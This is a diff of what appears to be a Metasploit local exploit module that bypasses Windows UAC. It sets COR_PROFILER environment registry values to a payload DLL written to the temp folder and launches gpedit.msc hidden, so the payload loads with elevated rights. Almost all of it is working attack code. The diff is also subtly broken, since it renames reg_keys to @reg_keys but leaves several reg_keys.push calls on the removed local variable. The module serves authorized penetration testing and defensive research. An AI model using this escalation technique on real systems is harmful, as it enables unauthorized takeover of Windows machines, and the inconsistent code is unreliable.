@@ -38,7 +38,9 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'DefaultTarget' => 0,
         'Notes' => {
-          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'Reliability' => []
         },
         'References' => [
           ['URL', 'https://seclists.org/fulldisclosure/2017/Jul/11'],
@@ -61,7 +63,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?
+    get_version_info
+    if is_uac_enabled?
       Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe
@@ -71,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Local
   def write_reg_value(registry_hash)
     vprint_status("Writing #{registry_hash[:value_name]} to #{registry_hash[:key_name]}")
     begin
-      if not registry_key_exist?(registry_hash[:key_name])
+      if !registry_key_exist?(registry_hash[:key_name])
         registry_createkey(registry_hash[:key_name])
         registry_hash[:delete_on_cleanup] = true
       else
@@ -99,12 +102,13 @@ class MetasploitModule < Msf::Exploit::Local
         registry_deleteval(registry_hash[:key_name], registry_hash[:value_name])
       end
     rescue Rex::Post::Meterpreter::RequestError => e
-      print_bad("Unable to clean up registry")
+      print_bad('Unable to clean up registry')
       print_error(e.to_s)
     end
   end
 
   def exploit
+    @reg_keys = []
     check_permissions!
     case get_uac_level
     when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
@@ -123,76 +127,79 @@ class MetasploitModule < Msf::Exploit::Local
 
     # get directory locations straight
     win_dir = session.sys.config.getenv('windir')
-    vprint_status("win_dir = " + win_dir)
+    vprint_status('win_dir = ' + win_dir)
     tmp_dir = session.sys.config.getenv('tmp')
-    vprint_status("tmp_dir = " + tmp_dir)
-    exploit_dir = win_dir + "\\System32\\"
-    vprint_status("exploit_dir = " + exploit_dir)
-    target_filepath = exploit_dir + "gpedit.msc"
-    vprint_status("target_filepath = " + target_filepath)
-    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.dll'
+    vprint_status('tmp_dir = ' + tmp_dir)
+    exploit_dir = win_dir + '\\System32\\'
+    vprint_status('exploit_dir = ' + exploit_dir)
+    target_filepath = exploit_dir + 'gpedit.msc'
+    vprint_status('target_filepath = ' + target_filepath)
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13)) + '.dll'
     payload_pathname = tmp_dir + '\\' + payload_name
 
     # make payload
-    vprint_status("Making Payload")
-    vprint_status("payload_pathname = " + payload_pathname)
+    vprint_status('Making Payload')
+    vprint_status('payload_pathname = ' + payload_pathname)
     payload = generate_payload_dll
 
     uuid = SecureRandom.uuid
     vprint_status("UUID = #{uuid}")
-    reg_keys = []
     # This reg key will not hurt anything in windows 10+, but is not required.
-    unless sysinfo['OS'] =~ /Windows (2016|10)/
-      reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
+    version = get_version_info
+    unless version.build_number >= Msf::WindowsVersion::Win10_InitialRelease
+      @reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
                     value_name: '',
-                    value_type: "REG_EXPAND_SZ",
+                    value_type: 'REG_EXPAND_SZ',
                     value_value: payload_pathname,
                     delete_on_cleanup: false)
     end
     reg_keys.push(key_name: "HKCU\\Environment",
-                  value_name: "COR_PROFILER",
-                  value_type: "REG_SZ",
+                  value_name: 'COR_PROFILER',
+                  value_type: 'REG_SZ',
                   value_value: "{#{uuid}}",
                   delete_on_cleanup: false)
     reg_keys.push(key_name: "HKCU\\Environment",
-                  value_name: "COR_ENABLE_PROFILING",
-                  value_type: "REG_SZ",
-                  value_value: "1",
+                  value_name: 'COR_ENABLE_PROFILING',
+                  value_type: 'REG_SZ',
+                  value_value: '1',
                   delete_on_cleanup: false)
     reg_keys.push(key_name: "HKCU\\Environment",
-                  value_name: "COR_PROFILER_PATH",
-                  value_type: "REG_SZ",
+                  value_name: 'COR_PROFILER_PATH',
+                  value_type: 'REG_SZ',
                   value_value: payload_pathname,
                   delete_on_cleanup: false)
-    reg_keys.each do |key_hash|
+    @reg_keys.each do |key_hash|
       write_reg_value(key_hash)
     end
 
     # Upload payload
     vprint_status("Uploading Payload to #{payload_pathname}")
     write_file(payload_pathname, payload)
-    vprint_status("Payload Upload Complete")
+    vprint_status('Payload Upload Complete')
 
-    vprint_status("Launching " + target_filepath)
+    vprint_status('Launching ' + target_filepath)
     begin
       session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true)
     rescue Rex::Post::Meterpreter::RequestError => e
       print_error(e.to_s)
     end
-    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
-    # wait for a few seconds before cleaning up
-    print_status("Please wait for session and cleanup....")
-    sleep(20)
-    vprint_status("Removing Registry Changes")
-    reg_keys.each do |key_hash|
-      remove_reg_value(key_hash)
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
+    print_status('Please wait for session and cleanup....')
+  end
+
+  def cleanup
+    if @reg_keys.present?
+    vprint_status('Removing Registry Changes')
+      @reg_keys.each do |key_hash|
+        remove_reg_value(key_hash)
+      end
+    vprint_status('Registry Changes Removed')
     end
-    vprint_status("Registry Changes Removed")
   end
 
   def check_permissions!
     unless check == Exploit::CheckCode::Appears
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
     end
     fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
     # Check if you are an admin
@@ -203,12 +210,10 @@ class MetasploitModule < Msf::Exploit::Local
     if admin_group.nil?
       print_error('Either whoami is not there or failed to execute')
       print_error('Continuing under assumption you already checked...')
+    elsif admin_group
+      print_good('Part of Administrators group! Continuing...')
     else
-      if admin_group
-        print_good('Part of Administrators group! Continuing...')
-      else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
-      end
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
